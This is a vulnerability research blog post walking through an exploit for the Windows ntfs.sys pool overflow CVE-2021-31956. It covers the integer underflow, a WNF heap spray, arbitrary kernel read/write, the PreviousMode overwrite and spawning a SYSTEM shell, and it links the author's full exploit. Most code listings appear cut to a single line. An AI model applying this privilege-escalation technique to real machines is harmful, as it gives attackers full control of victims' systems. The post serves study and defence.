Exploiting a paged pool overflow on Windows 10 to get system.
Introduction
In this post we’ll cover how to write an nday exploit for a Windows Kernel Pool overflow on a modern Windows 10 20H2 system, given an initial advisory, such as the one from Kaspersky regarding CVE-2021-31956 [1].
Advisory
The other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function NtfsQueryEaUserEaList processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via ntoskrnl syscall and among other things it’s possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn’t check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.
1 | for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry ) |
The exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.
As the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used “PreviousMode” technique instead.
Above is the original advisory released by Kaspersky, whose researchers first detected this vulnerability being exploited in the wild.
It contains a load of information, and the important ones are:
- a heap-based buffer overflow in ntfs.sys
- function NtfsQueryEaUserEaList
- accessible via ntoskrnl syscall
- integer-underflow
- exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF)
- exploit uses a rarely used “PreviousMode” technique
A nicely commented and named pseudo code is also provided, which greatly eases reverse engineering efforts.
Armed with these information, let’s try to recreate the exploit.
Finding the syscall
The original advisory stated that the bug can be triggered via a ntoskrnl syscall, which is available to usermode.
This should be our initial entrypoint of interacting with the kernel, so it’s important to find it out first.
Browsing a website that documents syscalls [2], we find the only two syscall related to Ea(extended attributes), are NtQueryEaFile
and NtSetEafile
.
Judging by name, one probably allows us to set extended attributes on a file, and the other allows querying those attributes.
We can confirm this by breaking on NtfsQueryEaUserEaList
in windbg, clicking around and viewing the call stack once the breakpoint hits.
1 | 0: kd> g |
Indeed, the usermode API NtQueryEaFile
will eventually call the vulnerable function.
Fortunately for us, the ZwQueryEaFile
[3] and ZwSetEaFile
[4] APIs are actually documented by MSDN.
Zw functions basically set a field called PreviousMode
in the _KTHREAD
structure to 0 to indicate a call from Kernel Mode, so userland check don’t occur when dispatching the API request, then calling the corresponding Nt function.
That being said, you can use the Zw function prototypes as the Nt function prototypes.
Initial POC
1 | NTSTATUS ZwQueryEaFile( |
1 | NTSTATUS ZwSetEaFile( |
Reading the documentation reveals that both these functions work by providing them a _FILE_FULL_EA_INFORMATION
[5] or _FILE_GET_EA_INFORMATION
[6] structure.
Both of these are non-circular singly linked lists by nature, linked by the NextEntryOffset
member, storing an EaName
and an EaValue
, separated by a null byte.
Each entry should be 4-byte aligned [7].
An example of setting and querying two EAs for a file will be:
1 | HANDLE file = INVALID_HANDLE_VALUE; |
The way of calculating NextEntryOffset
is taken from the decompiled NtfsQueryEaUserEaList
above. 0x9
bytes for the size of all the field members excluding actual data, adding 0x3
to ensure the buffer will not shrink when aligning it to 0x4
bytes with a bitwise AND.
If we want an integer underflow, out_buf_length
must be smaller than padding
while dealing with the second Ea list.
The smallest out_buf_length
we can achieve is 0x1
, which is when the size we specified is 1 byte larger than our first Ea list.
The largest padding
size we can achieve is 0x3
.
Using the values in the code above, a namelength of 0x3
and a valuelength of 0x9d
makes a total size of 0xa0
, which is 4-bytes aligned. Adding 0x9
to it gives us 0xa9
, which is one byte off.
This means upon adding 0x3
as the final calculation, our padding will be exactly 0x3
bytes.
Subtracting the unsigned out_buf_length
with a value slightly larger than itself yields a huge unsigned value, granting us a controlled size, controlled data pool overflow.
The question now is, is the size of pool allocation exactly the size we pass in?
We can verify it in IDA, by decompiling the parent function of NtfsQueryEaUserEaList
, which is NtfsCommonQueryEa
.
1 | pool_buf = ExAllocatePoolWithTag((POOL_TYPE)(PoolType | 0x10), (unsigned int)size, 0x4546744Eu); |
If our assumptions were correct, r9
should contain a 0xc0
sized pool chunk(0xaa+0x10 round up), and dword ptr [rsp+0x28]
should contain the size 0xaa
(0x28 due to return address and parameter homing for the 4 register arguments).
1 | 1: kd> g |
and yes, we were right.
If we allow the code to continue, it will certainly corrupt the pool chunk after ours, and likely crash the whole system.
We have to first “prepare” the pool to accept an overflow, so it’s predictable to us.
WNF
Before starting the exploitation steps, I’ll need to digress a little and talk about the Windows Notification Facility(WNF).
If you want a proper explanation regarding WNF and not my hacky garbage, check out this talk at Black Hat [8] and this blogpost by Gabrielle Viala [9].
Essentially, WNF is a feature of Windows for applications to deal with notifications.
For example, when an application has to wait on an event before continueing, but the event is non-existent yet, it can use WNF to monitor for that event.
Like all features of Windows, they are essentially a bunch of structures in the Kernel.
WNF has two main structures of interest, _WNF_NAME_INSTANCE
and _WNF_STATE_DATA
.
1 | //0xa8 bytes (sizeof) |
1 | //0x10 bytes (sizeof) |
We can create a name instance using the NtCreateWnfStateName
API.
1 | typedef NTSTATUS(NTAPI *NCWSN)( |
This will return a StateName
to usermode, which we can use to reference this particular name instance.
By passing this statename to the NtUpdateWnfStateData
function, a _WNF_STATE_DATA
structure is created.
The StateData
member(0x58) of the name instance points to this statedata structure.
1 | typedef NTSTATUS(NTAPI *NUWSD)( |
The Length
argument we pass is used to populate the AllocatedSize
and DataSize
of the _WNF_STATE_DATA
structure, where AllocatedSize
defines the size we can write, and DataSize
defines the size we can read.
1 | StateData = 0i64; |
Simplified pseudocode above for ExpWnfWriteStateData
shows that if StateData.AllocatedSize < Length, a new buffer will be allocated in the paged pool(controllable length again!). The new buffer is 0x10
bytes larger, because a new _WNF_STATE_DATA_
structure sits above the actual data.
Otherwise if AllocatedSize >= Length, data is copied to the old buffer, DataSize(read size) is set to Length, and ChangeStamp is updated accordingly.
We can read data with NtQueryWnfStateData
1 | typedef NTSTATUS(NTAPI *NQWSD)( |
1 | *ChangeStamp = *(_DWORD *)(*(_QWORD *)&StateData + 0xCi64); |
As shown in the simplified pseudocode for ExpWnfReadStateData
, BufferSize and ChangeStamp is updated at whatever is that StateData+0x8 and StateData+0xC respectively. Then data is copied back to usermode.
Finally, we can free both allocations with NtDeleteWnfStateData
and NtDeletWnfStateName
.
All in all, using both of these structures together can give us a really good read/write primitive.
The _WNF_NAME_INSTANCE
structure is 0xc0 sized in the paged pool. That’s why I chose the overflow chunk in the previous section to also be 0xc0 sized.
Size of the _WNF_STATE_DATA
structure can be controlled, based on the Length we pass to NtUpdateWnfStateData
.
Exploitation Outline
The idea is we try to get our overflowing Ntfs buffer from earlier, to be placed right before a _WNF_STATE_DATA
chunk in memory.
By overwriting the AllocatedSize
and DataSize
, we get a huge read/write ability in the pool ahead of this chunk.
We can use this to find a nearby _WNF_NAME_INSTANCE
chunk, and locate its StateName
.
With the StateName
, we can now query the _WNF_STATE_DATA
associated with this name instance(remember that statename is a reference to the name instance).
Using our write ability, update the StateData
pointer of the name instance to point anywhere in memory.
As long as the eventual AllocatedSize
and DataSize
of our rogue _WNF_STATE_DATA
is sane, we can read/write anywhere in memory.
Heap Spray
The kernel is active, and thousands of allocations and de-allocations are happening all the time.
The only way we can maximize our chances of having the Ntfs buffer placed before the _WNF_STATE_DATA
buffer, is to create tens of thousands of statedata buffer in the paged pool.
1 | for (int i = 0; i < count; i++) { |
This process is known as Heap Spraying.
Then we free roughly one third of the chunks.
1 | for (int i = 0; i < count; i += 3) { |
If we think of the pool full of WNF structures as a big blob of cheese, there are now thousands of holes in the cheese.
Many of these will be taken up by other 0xc0
size structures, allocated by other processes or even the kernel itself.
However if we are lucky(and if we spray enough), we should land right in the middle of a bunch of WNF structures.
1 | 1: kd> !pool @r9 |
The WNF Problem
The approach above has a pretty big problem. That is, we do not know if we overflown a _WNF_STATE_DATA
chunk, or a WNF_NAME_INSTANCE
chunk, since both are 0xc0 sized.
Blindly assuming can lead to a great fall in success rate.
If we inspect both structures, we can see the ChangeStamp
member of statedata being returned back.
This means if we carefully control the overflow to only 0x20 bytes(pool header + up to ChangeStamp), we can query all statedata chunks to verify if we actually overflown a statedata chunk.
If we did not, it will only corrupt the Header
and RunRef
field of the nameinstance chunk, which is ok for now. We can fix that at the end of the exploit. We will just have to attempt the overflow again.
1 | do { |
Enumerating _KTHREADS
Now, assuming our attack succeeded and we gain arbitrary read/write, where should we write?
Of course we can directly NULL out current process ACL or steal a system token, but to emulate the adversary, I think we should perform the PreviousMode
attack.
More about PreviousMode on the next section. For now just know it’s a field in the _KTHREAD
structure, which is referenced by the _KPROCESS
structure’s ThreadListHead
member, and _KPROCESS
shares the address with _EPROCESS
.
In order to increase the success rate of our attack, we should perform the attack on all _KTHREAD
s present in the process.
With our arbitrary read, we first read the Blink of the ThreadListHead
member, a backward link of the circular doubly linked LIST_ENTRY
.
This Blink
will point to the first _KTHREAD
‘s ThreadListEntry
field, so we subtract 0x2f8 to find the first _KTHREAD
‘s address.
1 | threadlisthead = (ULONG_PTR)((ULONG_PTR)own_eproc + (ULONG_PTR)0x30); |
Some points to explain in the code above.
Firstly, we XOR the leaked statename with the statename constant of 0x41C64E6DA3BC0074
. Reason being, the statename returned to usermode is actually not the actual statename stored in kernel memory.
Then we point the StateData
at the ThreadListHead
member and attempt a query.
This query will fail, because we don’t have sane size fields near there. Even if we do, we don’t know how much of a buffer to pass it, because the read operation demands an exact size of the DataSize
member.
However, recall from the WNF section above, the ChangeStamp
and BufferSize
fields are actually populated with values at that memory location.
In this case, they will form the Blink
value.
(Fun fact, I made a mistake by naming them flink in my actual exploit lmao.)
You may ask how did I find my own _KPROCESS
address in the first place?
I used a well known trick using the NtQuerySystemInformation
API(also used in my Exploiting Inherited Handles blog) to leak out kernel addresses of handles.
However, we can actually also read the CreatorProcess
field of _WNF_NAME_INSTANCE
to leak the _KPROCESS
of our current process, in case the API gets patched in future releases.
From here, we can traverse the list and enumerate all _KTHREAD
s.
1 | for (int i = 1; i < MAX_THREAD_SEARCH; i++) { |
Once we find all the threads, we can perform the PreviousMode Attack on all of them.
PreviousMode Attack
PreviousMode
is a one byte member of the _KTHREAD
structure.
It’s used when kernel APIs(those implemented in ntoskrnl.exe, but share the same name with user APIs in ntdll.dll) are performing validation.
UserMode has a value of 1, and KernelMode has a value of 0.
When an API request is serviced, security checks will be invoked based on the PreviousMode.
For example, memory boundary checking is enforced if PreviousMode is set to 1 for the NtReadVirtualMemory API to make sure usermode threads cannot read kernel data.
However if PreviousMode is set to 0, the system will gladly skip all checks and assume you are running as a kernel driver.
This is great news for us as exploit writers.
By nulling out the PreviousMode byte, we can achieve real and hassle free arbitrary read write, with Windows APIs.
1 | for (int i = 0; i < MAX_THREAD_SEARCH; i++) { |
Clean Up
Stealing token and spawning shell is pretty straightforward, so I’ll skip to cleanup.
There are a few things we have to clean up.
While trying to overflow statedata chunks, we might have set the RunRef
member of a nameinstance chunk to an invalid value.
This can lead to a crash when the system uses this field.
Since it’s a reference counter, we can fix it by setting it to 0.
We can find all our nameinstance blocks by accessing the WnfContext
field of our _EPROCESS
and traversing the linked list.
1 | NTSTATUS fix_runrefs(_In_ PWNF_PROCESS_CONTEXT ctx) |
Next, we’ll have to set the PreviousMode
of all _KTHREAD
s back to 1, because we don’t know which ones were set to 1 before.
Even if we set an actual kernel thread’s PreviousMode
to 1, it should still be fine, because by right kernel code should call the Zw version of functions, which still bypasses checks.
Finally, we have to patch the StateData
pointer of our corrupted nameinstance chunk.
1 | if (!NT_SUCCESS(fix_runrefs(ctx))) |
And now we can happily spawn a system shell, with the system still stable, unless the heap spray failed and we accidentally overwrote some other datastructure other than the WNF structures.
Conclusion
You can find my full exploit here:
https://github.com/Y3A/CVE-2021-31956
Abusing WNF structures was new to me, but I’m impressed by its flexible read/write capabilities.
Furthermore, it’s a paged pool gadget, which is quite rare(normally you hear people exploiting non-paged pools more).
I’m pretty convinced that kernel exploitation is mostly about “who has more super secret undocumented gadgets of varying sizes to use in both pools”.
Without shoulder standing on the references listed below, there’s no way I could have figured all these out in an efficient amount of time.
All respects to vuln/system researchers!
Update
A reader reflected that he was unable to call the WNF APIs from low privilege(e.g chrome sandbox).
My exploit here does not take that into consideration, but as mentioned by @k0shl in a tweet, it’s absolutely possible to launch the exploit from a sandbox.
Ad verbum:
1 | Well, this depends on the SecurityDescriptor parameter of NtCreateWnfStateName and NtUpdateWnfStateData, in the sandboxed situation, you should invoke NtQuerySecurityObject from process token and get a SD which can be accessed by sandboxed process, and pass it to WNF API |
His code to achieve this:
1 | BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) { |
References
- https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/
- https://hfiref0x.github.io/syscalls.html
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-zwqueryeafile
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-zwseteafile
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_file_full_ea_information
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_file_get_ea_information
- https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/0eb94f48-6aac-41df-a878-79f4dcfd8989
- https://www.youtube.com/watch?v=MybmgE95weo
- https://blog.quarkslab.com/playing-with-the-windows-notification-facility-wnf.html